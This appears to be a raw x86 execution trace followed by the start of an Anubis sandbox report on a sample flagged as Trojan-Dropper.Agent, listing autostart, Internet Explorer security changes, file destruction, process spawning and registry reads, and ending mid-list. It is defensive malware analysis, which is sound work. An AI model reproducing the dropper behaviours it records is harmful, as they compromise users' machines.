eax = ffffffff ebx = 91c086a ecx = 7c92f641 edx = 3 esi = 91c08bc edi = 12c890
eip = 91c075b esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C075B:: 75 0D jnz 0x91c076a
eax = ffffffff ebx = 91c086a ecx = 7c92f641 edx = 3 esi = 91c08bc edi = 12c890
eip = 91c075d esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C075D:: 59 pop ecx
eax = ffffffff ebx = 91c086a ecx = 2 edx = 3 esi = 91c08bc edi = 12c890
eip = 91c075e esp = 12c890 ebp = 12cbe0 eflags = 200246
0x091C075E:: 80 F9 01 cmp cl, 0x1
eax = ffffffff ebx = 91c086a ecx = 2 edx = 3 esi = 91c08bc edi = 12c890
eip = 91c0761 esp = 12c890 ebp = 12cbe0 eflags = 200202
0x091C0761:: 51 push ecx
eax = ffffffff ebx = 91c086a ecx = 2 edx = 3 esi = 91c08bc edi = 12c890
eip = 91c0762 esp = 12c88c ebp = 12cbe0 eflags = 200202
0x091C0762:: 0F 85 AC 00 00 00 jnz 0x91c0814
eax = ffffffff ebx = 91c086a ecx = 2 edx = 3 esi = 91c08bc edi = 12c890
eip = 91c0814 esp = 12c88c ebp = 12cbe0 eflags = 200202
0x091C0814:: 59 pop ecx
eax = ffffffff ebx = 91c086a ecx = 2 edx = 3 esi = 91c08bc edi = 12c890
eip = 91c0815 esp = 12c890 ebp = 12cbe0 eflags = 200202
0x091C0815:: 49 dec ecx
eax = ffffffff ebx = 91c086a ecx = 1 edx = 3 esi = 91c08bc edi = 12c890
eip = 91c0816 esp = 12c890 ebp = 12cbe0 eflags = 200202
0x091C0816:: 8B 75 F0 mov esi, dword ptr [ebp-0x10]
eax = ffffffff ebx = 91c086a ecx = 1 edx = 3 esi = 9430000 edi = 12c890
eip = 91c0819 esp = 12c890 ebp = 12cbe0 eflags = 200202
0x091C0819:: AD lodsd dword ptr [esi]
eax = 0 ebx = 91c086a ecx = 1 edx = 3 esi = 9430004 edi = 12c890
eip = 91c081a esp = 12c890 ebp = 12cbe0 eflags = 200202
0x091C081A:: 03 F0 add esi, eax
eax = 0 ebx = 91c086a ecx = 1 edx = 3 esi = 9430004 edi = 12c890
eip = 91c081c esp = 12c890 ebp = 12cbe0 eflags = 200202
0x091C081C:: 89 75 F0 mov dword ptr [ebp-0x10], esi
eax = 0 ebx = 91c086a ecx = 1 edx = 3 esi = 9430004 edi = 12c890
eip = 91c081f esp = 12c890 ebp = 12cbe0 eflags = 200202
0x091C081F:: 8B 75 F4 mov esi, dword ptr [ebp-0xc]
eax = 0 ebx = 91c086a ecx = 1 edx = 3 esi = 91c08bc edi = 12c890
eip = 91c0822 esp = 12c890 ebp = 12cbe0 eflags = 200202
0x091C0822:: 51 push ecx
eax = 0 ebx = 91c086a ecx = 1 edx = 3 esi = 91c08bc edi = 12c890
eip = 91c0823 esp = 12c88c ebp = 12cbe0 eflags = 200202
0x091C0823:: 80 F9 00 cmp cl, 0x0
eax = 0 ebx = 91c086a ecx = 1 edx = 3 esi = 91c08bc edi = 12c890
eip = 91c0826 esp = 12c88c ebp = 12cbe0 eflags = 200202
0x091C0826:: 0F 85 00 FF FF FF jnz 0x91c072c
eax = 0 ebx = 91c086a ecx = 1 edx = 3 esi = 91c08bc edi = 12c890
eip = 91c072c esp = 12c88c ebp = 12cbe0 eflags = 200202
0x091C072C:: 8D BD B0 FC FF FF lea edi, ptr [ebp-0x350]
eax = 0 ebx = 91c086a ecx = 1 edx = 3 esi = 91c08bc edi = 12c890
eip = 91c0732 esp = 12c88c ebp = 12cbe0 eflags = 200202
0x091C0732:: 57 push edi
eax = 0 ebx = 91c086a ecx = 1 edx = 3 esi = 91c08bc edi = 12c890
eip = 91c0733 esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C0733:: 8B 45 FC mov eax, dword ptr [ebp-0x4]
eax = 23 ebx = 91c086a ecx = 1 edx = 3 esi = 91c08bc edi = 12c890
eip = 91c0736 esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C0736:: 03 F8 add edi, eax
eax = 23 ebx = 91c086a ecx = 1 edx = 3 esi = 91c08bc edi = 12c8b3
eip = 91c0738 esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C0738:: AC lodsb byte ptr [esi]
eax = 70 ebx = 91c086a ecx = 1 edx = 3 esi = 91c08bd edi = 12c8b3
eip = 91c0739 esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C0739:: AA stosb byte ptr [edi]
eax = 70 ebx = 91c086a ecx = 1 edx = 3 esi = 91c08bd edi = 12c8b4
eip = 91c073a esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C073A:: 3C 00 cmp al, 0x0
eax = 70 ebx = 91c086a ecx = 1 edx = 3 esi = 91c08bd edi = 12c8b4
eip = 91c073c esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C073C:: 75 FA jnz 0x91c0738
eax = ffffffff ebx = 91c086a ecx = 1 edx = 3 esi = 91c08c8 edi = 12c890
eip = 91c0768 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C0768:: EB 4B jmp 0x91c07b5
eax = ffffffff ebx = 91c086a ecx = 1 edx = 3 esi = 91c08c8 edi = 12c890
eip = 91c07b5 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C07B5:: 8D BD FC FE FF FF lea edi, ptr [ebp-0x104]
eax = ffffffff ebx = 91c086a ecx = 1 edx = 3 esi = 91c08c8 edi = 12cadc
eip = 91c07bb esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C07BB:: 33 C0 xor eax, eax
eax = 0 ebx = 91c086a ecx = 1 edx = 3 esi = 91c08c8 edi = 12cadc
eip = 91c07bd esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C07BD:: B9 11 00 00 00 mov ecx, 0x11
eax = 0 ebx = 91c086a ecx = 11 edx = 3 esi = 91c08c8 edi = 12cadc
eip = 91c07c2 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C07C2:: F2 AB repne stosd dword ptr [edi]
eax = 0 ebx = 91c086a ecx = 10 edx = 3 esi = 91c08c8 edi = 12cae0
eip = 91c07c2 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C07C2:: F2 AB repne stosd dword ptr [edi]
eax = 0 ebx = 91c086a ecx = 0 edx = 3 esi = 91c08c8 edi = 12cb20
eip = 91c07c4 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C07C4:: 8D 9D C0 FD FF FF lea ebx, ptr [ebp-0x240]
eax = 0 ebx = 12c9a0 ecx = 0 edx = 3 esi = 91c08c8 edi = 12cb20
eip = 91c07ca esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C07CA:: 68 04 01 00 00 push 0x104
eax = 0 ebx = 12c9a0 ecx = 0 edx = 3 esi = 91c08c8 edi = 12cb20
eip = 91c07cf esp = 12c888 ebp = 12cbe0 eflags = 200246
0x091C07CF:: 53 push ebx
eax = 0 ebx = 12c9a0 ecx = 0 edx = 3 esi = 91c08c8 edi = 12cb20
eip = 91c07d0 esp = 12c884 ebp = 12cbe0 eflags = 200246
0x091C07D0:: 6A 00 push 0x0
eax = 0 ebx = 12c9a0 ecx = 0 edx = 3 esi = 91c08c8 edi = 12cb20
eip = 91c07d2 esp = 12c880 ebp = 12cbe0 eflags = 200246
0x091C07D2:: 8B 5D 00 mov ebx, dword ptr [ebp]
eax = 0 ebx = 91c086a ecx = 0 edx = 3 esi = 91c08c8 edi = 12cb20
eip = 91c07d5 esp = 12c880 ebp = 12cbe0 eflags = 200246
0x091C07D5:: FF 53 24 call dword ptr [ebx+0x24]
eax = 35 ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 91c08c8 edi = 12cb20
eip = 91c07d8 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C07D8:: 8D BD C0 FD FF FF lea edi, ptr [ebp-0x240]
eax = 35 ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 91c08c8 edi = 12c9a0
eip = 91c07de esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C07DE:: 57 push edi
eax = 35 ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 91c08c8 edi = 12c9a0
eip = 91c07df esp = 12c888 ebp = 12cbe0 eflags = 200246
0x091C07DF:: 03 F8 add edi, eax
eax = 35 ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 91c08c8 edi = 12c9d5
eip = 91c07e1 esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C07E1:: B0 20 mov al, 0x20
eax = 20 ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 91c08c8 edi = 12c9d5
eip = 91c07e3 esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C07E3:: AA stosb byte ptr [edi]
eax = 20 ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 91c08c8 edi = 12c9d6
eip = 91c07e4 esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C07E4:: 8D B5 B0 FC FF FF lea esi, ptr [ebp-0x350]
eax = 20 ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 12c890 edi = 12c9d6
eip = 91c07ea esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C07EA:: B0 22 mov al, 0x22
eax = 22 ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 12c890 edi = 12c9d6
eip = 91c07ec esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C07EC:: AA stosb byte ptr [edi]
eax = 22 ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 12c890 edi = 12c9d7
eip = 91c07ed esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C07ED:: AC lodsb byte ptr [esi]
eax = 43 ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 12c891 edi = 12c9d7
eip = 91c07ee esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C07EE:: AA stosb byte ptr [edi]
eax = 43 ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 12c891 edi = 12c9d8
eip = 91c07ef esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C07EF:: 3C 00 cmp al, 0x0
eax = 43 ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 12c891 edi = 12c9d8
eip = 91c07f1 esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C07F1:: 75 FA jnz 0x91c07ed
eax = 43 ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 12c891 edi = 12c9d8
eip = 91c07ed esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C07ED:: AC lodsb byte ptr [esi]
eax = 3a ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 12c892 edi = 12c9d8
eip = 91c07ee esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C07EE:: AA stosb byte ptr [edi]
eax = 3a ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 12c892 edi = 12c9d9
eip = 91c07ef esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C07EF:: 3C 00 cmp al, 0x0
eax = 3a ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 12c892 edi = 12c9d9
eip = 91c07f1 esp = 12c888 ebp = 12cbe0 eflags = 200206
0x091C07F1:: 75 FA jnz 0x91c07ed
eax = 0 ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 12c8bf edi = 12ca06
eip = 91c07f3 esp = 12c888 ebp = 12cbe0 eflags = 200246
0x091C07F3:: 4F dec edi
eax = 0 ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 12c8bf edi = 12ca05
eip = 91c07f4 esp = 12c888 ebp = 12cbe0 eflags = 200206
0x091C07F4:: B0 22 mov al, 0x22
eax = 22 ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 12c8bf edi = 12ca05
eip = 91c07f6 esp = 12c888 ebp = 12cbe0 eflags = 200206
0x091C07F6:: AA stosb byte ptr [edi]
eax = 22 ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 12c8bf edi = 12ca06
eip = 91c07f7 esp = 12c888 ebp = 12cbe0 eflags = 200206
0x091C07F7:: B0 00 mov al, 0x0
eax = 0 ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 12c8bf edi = 12ca06
eip = 91c07f9 esp = 12c888 ebp = 12cbe0 eflags = 200206
0x091C07F9:: AA stosb byte ptr [edi]
eax = 0 ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 12c8bf edi = 12ca07
eip = 91c07fa esp = 12c888 ebp = 12cbe0 eflags = 200206
0x091C07FA:: 5F pop edi
eax = 0 ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 12c8bf edi = 12c9a0
eip = 91c07fb esp = 12c88c ebp = 12cbe0 eflags = 200206
0x091C07FB:: 8D 9D FC FE FF FF lea ebx, ptr [ebp-0x104]
eax = 0 ebx = 12cadc ecx = 7c93003d edx = a20001 esi = 12c8bf edi = 12c9a0
eip = 91c0801 esp = 12c88c ebp = 12cbe0 eflags = 200206
0x091C0801:: 53 push ebx
eax = 0 ebx = 12cadc ecx = 7c93003d edx = a20001 esi = 12c8bf edi = 12c9a0
eip = 91c0802 esp = 12c888 ebp = 12cbe0 eflags = 200206
0x091C0802:: 83 C3 04 add ebx, 0x4
eax = 0 ebx = 12cae0 ecx = 7c93003d edx = a20001 esi = 12c8bf edi = 12c9a0
eip = 91c0805 esp = 12c888 ebp = 12cbe0 eflags = 200212
0x091C0805:: 53 push ebx
eax = 0 ebx = 12cae0 ecx = 7c93003d edx = a20001 esi = 12c8bf edi = 12c9a0
eip = 91c0806 esp = 12c884 ebp = 12cbe0 eflags = 200212
0x091C0806:: 50 push eax
eax = 0 ebx = 12cae0 ecx = 7c93003d edx = a20001 esi = 12c8bf edi = 12c9a0
eip = 91c0807 esp = 12c880 ebp = 12cbe0 eflags = 200212
0x091C0807:: 50 push eax
eax = 0 ebx = 12cae0 ecx = 7c93003d edx = a20001 esi = 12c8bf edi = 12c9a0
eip = 91c0808 esp = 12c87c ebp = 12cbe0 eflags = 200212
0x091C0808:: 50 push eax
eax = 0 ebx = 12cae0 ecx = 7c93003d edx = a20001 esi = 12c8bf edi = 12c9a0
eip = 91c0809 esp = 12c878 ebp = 12cbe0 eflags = 200212
0x091C0809:: 50 push eax
eax = 0 ebx = 12cae0 ecx = 7c93003d edx = a20001 esi = 12c8bf edi = 12c9a0
eip = 91c080a esp = 12c874 ebp = 12cbe0 eflags = 200212
0x091C080A:: 50 push eax
eax = 0 ebx = 12cae0 ecx = 7c93003d edx = a20001 esi = 12c8bf edi = 12c9a0
eip = 91c080b esp = 12c870 ebp = 12cbe0 eflags = 200212
0x091C080B:: 50 push eax
eax = 0 ebx = 12cae0 ecx = 7c93003d edx = a20001 esi = 12c8bf edi = 12c9a0
eip = 91c080c esp = 12c86c ebp = 12cbe0 eflags = 200212
0x091C080C:: 57 push edi
eax = 0 ebx = 12cae0 ecx = 7c93003d edx = a20001 esi = 12c8bf edi = 12c9a0
eip = 91c080d esp = 12c868 ebp = 12cbe0 eflags = 200212
0x091C080D:: 50 push eax
eax = 0 ebx = 12cae0 ecx = 7c93003d edx = a20001 esi = 12c8bf edi = 12c9a0
eip = 91c080e esp = 12c864 ebp = 12cbe0 eflags = 200212
0x091C080E:: 8B 5D 00 mov ebx, dword ptr [ebp]
eax = 0 ebx = 91c086a ecx = 7c93003d edx = a20001 esi = 12c8bf edi = 12c9a0
eip = 91c0811 esp = 12c864 ebp = 12cbe0 eflags = 200212
0x091C0811:: FF 53 28 call dword ptr [ebx+0x28]
eax = 1 ebx = 91c086a ecx = 7c81d63b edx = 320003 esi = 12c8bf edi = 12c9a0
eip = 91c0814 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C0814:: 59 pop ecx
eax = 1 ebx = 91c086a ecx = 1 edx = 320003 esi = 12c8bf edi = 12c9a0
eip = 91c0815 esp = 12c890 ebp = 12cbe0 eflags = 200246
0x091C0815:: 49 dec ecx
eax = 1 ebx = 91c086a ecx = 0 edx = 320003 esi = 12c8bf edi = 12c9a0
eip = 91c0816 esp = 12c890 ebp = 12cbe0 eflags = 200246
0x091C0816:: 8B 75 F0 mov esi, dword ptr [ebp-0x10]
eax = 1 ebx = 91c086a ecx = 0 edx = 320003 esi = 9430004 edi = 12c9a0
eip = 91c0819 esp = 12c890 ebp = 12cbe0 eflags = 200246
0x091C0819:: AD lodsd dword ptr [esi]
eax = 0 ebx = 91c086a ecx = 0 edx = 320003 esi = 9430008 edi = 12c9a0
eip = 91c081a esp = 12c890 ebp = 12cbe0 eflags = 200246
0x091C081A:: 03 F0 add esi, eax
eax = 0 ebx = 91c086a ecx = 0 edx = 320003 esi = 9430008 edi = 12c9a0
eip = 91c081c esp = 12c890 ebp = 12cbe0 eflags = 200202
0x091C081C:: 89 75 F0 mov dword ptr [ebp-0x10], esi
eax = 0 ebx = 91c086a ecx = 0 edx = 320003 esi = 9430008 edi = 12c9a0
eip = 91c081f esp = 12c890 ebp = 12cbe0 eflags = 200202
0x091C081F:: 8B 75 F4 mov esi, dword ptr [ebp-0xc]
eax = 0 ebx = 91c086a ecx = 0 edx = 320003 esi = 91c08c8 edi = 12c9a0
eip = 91c0822 esp = 12c890 ebp = 12cbe0 eflags = 200202
0x091C0822:: 51 push ecx
eax = 0 ebx = 91c086a ecx = 0 edx = 320003 esi = 91c08c8 edi = 12c9a0
eip = 91c0823 esp = 12c88c ebp = 12cbe0 eflags = 200202
0x091C0823:: 80 F9 00 cmp cl, 0x0
eax = 0 ebx = 91c086a ecx = 0 edx = 320003 esi = 91c08c8 edi = 12c9a0
eip = 91c0826 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C0826:: 0F 85 00 FF FF FF jnz 0x91c072c
eax = 0 ebx = 91c086a ecx = 0 edx = 320003 esi = 91c08c8 edi = 12c9a0
eip = 91c082c esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C082C:: 8B 45 F8 mov eax, dword ptr [ebp-0x8]
eax = ffffffff ebx = 91c086a ecx = 0 edx = 320003 esi = 91c08c8 edi = 12c9a0
eip = 91c082f esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C082F:: 50 push eax
eax = ffffffff ebx = 91c086a ecx = 0 edx = 320003 esi = 91c08c8 edi = 12c9a0
eip = 91c0830 esp = 12c888 ebp = 12cbe0 eflags = 200246
0x091C0830:: 8B 5D 00 mov ebx, dword ptr [ebp]
eax = ffffffff ebx = 91c086a ecx = 0 edx = 320003 esi = 91c08c8 edi = 12c9a0
eip = 91c0833 esp = 12c888 ebp = 12cbe0 eflags = 200246
0x091C0833:: FF 53 20 call dword ptr [ebx+0x20]
eax = 0 ebx = 91c086a ecx = 7c92f641 edx = 7 esi = 91c08c8 edi = 12c9a0
eip = 91c0836 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C0836:: 8D BD B0 FC FF FF lea edi, ptr [ebp-0x350]
eax = 0 ebx = 91c086a ecx = 7c92f641 edx = 7 esi = 91c08c8 edi = 12c890
eip = 91c083c esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C083C:: 57 push edi
eax = 0 ebx = 91c086a ecx = 7c92f641 edx = 7 esi = 91c08c8 edi = 12c890
eip = 91c083d esp = 12c888 ebp = 12cbe0 eflags = 200246
0x091C083D:: 8B 45 FC mov eax, dword ptr [ebp-0x4]
eax = 23 ebx = 91c086a ecx = 7c92f641 edx = 7 esi = 91c08c8 edi = 12c890
eip = 91c0840 esp = 12c888 ebp = 12cbe0 eflags = 200246
0x091C0840:: 03 F8 add edi, eax
eax = 23 ebx = 91c086a ecx = 7c92f641 edx = 7 esi = 91c08c8 edi = 12c8b3
eip = 91c0842 esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C0842:: 8B 75 00 mov esi, dword ptr [ebp]
eax = 23 ebx = 91c086a ecx = 7c92f641 edx = 7 esi = 91c086a edi = 12c8b3
eip = 91c0845 esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C0845:: 83 C6 38 add esi, 0x38
eax = 23 ebx = 91c086a ecx = 7c92f641 edx = 7 esi = 91c08a2 edi = 12c8b3
eip = 91c0848 esp = 12c888 ebp = 12cbe0 eflags = 200212
0x091C0848:: AC lodsb byte ptr [esi]
eax = 31 ebx = 91c086a ecx = 7c92f641 edx = 7 esi = 91c08a3 edi = 12c8b3
eip = 91c0849 esp = 12c888 ebp = 12cbe0 eflags = 200212
0x091C0849:: AA stosb byte ptr [edi]
eax = 31 ebx = 91c086a ecx = 7c92f641 edx = 7 esi = 91c08a3 edi = 12c8b4
eip = 91c084a esp = 12c888 ebp = 12cbe0 eflags = 200212
0x091C084A:: 3C 00 cmp al, 0x0
eax = 31 ebx = 91c086a ecx = 7c92f641 edx = 7 esi = 91c08a3 edi = 12c8b4
eip = 91c084c esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C084C:: 75 FA jnz 0x91c0848
eax = 31 ebx = 91c086a ecx = 7c92f641 edx = 7 esi = 91c08a3 edi = 12c8b4
eip = 91c0848 esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C0848:: AC lodsb byte ptr [esi]
eax = 2e ebx = 91c086a ecx = 7c92f641 edx = 7 esi = 91c08a4 edi = 12c8b4
eip = 91c0849 esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C0849:: AA stosb byte ptr [edi]
eax = 2e ebx = 91c086a ecx = 7c92f641 edx = 7 esi = 91c08a4 edi = 12c8b5
eip = 91c084a esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C084A:: 3C 00 cmp al, 0x0
eax = 2e ebx = 91c086a ecx = 7c92f641 edx = 7 esi = 91c08a4 edi = 12c8b5
eip = 91c084c esp = 12c888 ebp = 12cbe0 eflags = 200206
0x091C084C:: 75 FA jnz 0x91c0848
eax = 0 ebx = 91c086a ecx = 7c92f641 edx = 7 esi = 91c08a8 edi = 12c8b9
eip = 91c084e esp = 12c888 ebp = 12cbe0 eflags = 200246
0x091C084E:: 5F pop edi
eax = 0 ebx = 91c086a ecx = 7c92f641 edx = 7 esi = 91c08a8 edi = 12c890
eip = 91c084f esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C084F:: 57 push edi
eax = 0 ebx = 91c086a ecx = 7c92f641 edx = 7 esi = 91c08a8 edi = 12c890
eip = 91c0850 esp = 12c888 ebp = 12cbe0 eflags = 200246
0x091C0850:: 8B 5D 00 mov ebx, dword ptr [ebp]
eax = 0 ebx = 91c086a ecx = 7c92f641 edx = 7 esi = 91c08a8 edi = 12c890
eip = 91c0853 esp = 12c888 ebp = 12cbe0 eflags = 200246
0x091C0853:: FF 53 2C call dword ptr [ebx+0x2c]
eax = 0 ebx = 91c086a ecx = 7c92f641 edx = 6 esi = 91c08a8 edi = 12c890
eip = 91c0856 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C0856:: 8B 5D 00 mov ebx, dword ptr [ebp]
eax = 0 ebx = 91c086a ecx = 7c92f641 edx = 6 esi = 91c08a8 edi = 12c890
eip = 91c0859 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C0859:: FF 53 30 call dword ptr [ebx+0x30]
eax = ffffffff ebx = 91c086a ecx = 7c92f641 edx = 6 esi = 91c08a8 edi = 12c890
eip = 91c085c esp = 12c88c ebp = 12cbe0 eflags = 200286
0x091C085C:: 6A 00 push 0x0
eax = ffffffff ebx = 91c086a ecx = 7c92f641 edx = 6 esi = 91c08a8 edi = 12c890
eip = 91c085e esp = 12c888 ebp = 12cbe0 eflags = 200286
0x091C085E:: 50 push eax
eax = ffffffff ebx = 91c086a ecx = 7c92f641 edx = 6 esi = 91c08a8 edi = 12c890
eip = 91c085f esp = 12c884 ebp = 12cbe0 eflags = 200286
0x091C085F:: 8B 5D 00 mov ebx, dword ptr [ebp]
eax = ffffffff ebx = 91c086a ecx = 7c92f641 edx = 6 esi = 91c08a8 edi = 12c890
eip = 91c0862 esp = 12c884 ebp = 12cbe0 eflags = 200286
0x091C0862:: FF 53 34 call dword ptr [ebx+0x34]

-- eof -

[#############################################################################]
    Anubis Analysis Report for 939b7526572f0c128c0cda9baed7f8a3.exe
                   MD5: 939b7526572f0c128c0cda9baed7f8a3
[#############################################################################]

Summary: 
    - Autostart capabilities: 
        This executable registers processes to be executed at system start.
        This could result in unwanted actions to be performed automatically.

- Changes security settings of Internet Explorer:
        This system alteration could seriously affect safety surfing the World
        Wide Web.

- Performs File Modification and Destruction:
        The executable modifiesand destructs files which are not temporary.

- Spawns Processes:
        The executable produces processes during the execution.

- Performs Registry Activities:
        The executable reads and modifies registry values. It also creates and
        monitors registry keys.

[=============================================================================]
    Table of Contents
[=============================================================================]

- General information
- 939b752657.exe
  a) Registry Activities
  b) File Activities
  c) Process Activities
    - cisvc.exe
      a) Registry Activities
      b) File Activities
      c) Network Activities

[#############################################################################]
    1. General Information
[#############################################################################]
[=============================================================================]
    Information about Anubis' invocation
[=============================================================================]
        Time needed:        241 s
        Report created:     08/11/10, 03:32:00 UTC
        Termination reason: Timeout
        Program version:    1.74.3016

[#############################################################################]
    2. 939b752657.exe
[#############################################################################]
[=============================================================================]
    General information about this executable
[=============================================================================]
        Analysis Reason: Primary Analysis Subject
        Filename:        939b752657.exe
        MD5:             939b7526572f0c128c0cda9baed7f8a3
        SHA-1:           eebe799a4b3ac5af14a57be73c1fecde159ca652
        File Size:       7763 Bytes
        Command Line:    "C:\939b752657.exe" 
        Process-status
        at analysis end: dead
        Exit Code:       2

[=============================================================================]
    Load-time Dlls
[=============================================================================]
        Module Name: [ C:\WINDOWS\system32\ntdll.dll ],
               Base Address: [0x7C900000 ], Size: [0x000AF000 ]
        Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
               Base Address: [0x7C800000 ], Size: [0x000F6000 ]
        Module Name: [ C:\WINDOWS\system32\ADVAPI32.DLL ],
               Base Address: [0x77DD0000 ], Size: [0x0009B000 ]
        Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ],
               Base Address: [0x77E70000 ], Size: [0x00092000 ]
        Module Name: [ C:\WINDOWS\system32\Secur32.dll ],
               Base Address: [0x77FE0000 ], Size: [0x00011000 ]
        Module Name: [ C:\WINDOWS\system32\WININET.DLL ],
               Base Address: [0x771B0000 ], Size: [0x000AA000 ]
        Module Name: [ C:\WINDOWS\system32\CRYPT32.dll ],
               Base Address: [0x77A80000 ], Size: [0x00095000 ]
        Module Name: [ C:\WINDOWS\system32\MSASN1.dll ],
               Base Address: [0x77B20000 ], Size: [0x00012000 ]
        Module Name: [ C:\WINDOWS\system32\msvcrt.dll ],
               Base Address: [0x77C10000 ], Size: [0x00058000 ]
        Module Name: [ C:\WINDOWS\system32\USER32.dll ],
               Base Address: [0x7E410000 ], Size: [0x00091000 ]
        Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
               Base Address: [0x77F10000 ], Size: [0x00049000 ]
        Module Name: [ C:\WINDOWS\system32\OLEAUT32.dll ],
               Base Address: [0x77120000 ], Size: [0x0008B000 ]
        Module Name: [ C:\WINDOWS\system32\ole32.dll ],
               Base Address: [0x774E0000 ], Size: [0x0013D000 ]
        Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ],
               Base Address: [0x77F60000 ], Size: [0x00076000 ]
        Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ],
               Base Address: [0x773D0000 ], Size: [0x00103000 ]

[=============================================================================]
    SigBuster Output
[=============================================================================]
        NsPack All_Versions SN:1635

[=============================================================================]
    Ikarus Virus Scanner
[=============================================================================]
        Trojan-Dropper.Agent (Sig-Id: 491957)

[=============================================================================]
    2.a) 939b752657.exe - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        Key: [ HKLM\SYSTEM\CurrentControlSet\Control\Session Manager ], 
             Value Name: [ CriticalSectionTimeout ], Value: [ 2592000 ], 1 time
        Key: [ HKLM\SYSTEM\WPA\MediaCenter ], 
             Value Name: [ Installed ], Value: [ 0 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ], 
             Value Name: [ AuthenticodeEnabled ], Value: [ 0 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ], 
             Value Name: [ DefaultLevel ], Value: [ 262144 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ], 
             Value Name: [ PolicyScope ], Value: [ 0 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ], 
             Value Name: [ TransparentEnabled ], Value: [ 1 ], 2 times
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ], 
             Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ], 
             Value Name: [ ItemData ], Value: [ 0x5eab304f957a49896a006c1c31154015 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ], 
             Value Name: [ ItemSize ], Value: [ 779 ], 1 time
        Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ], 
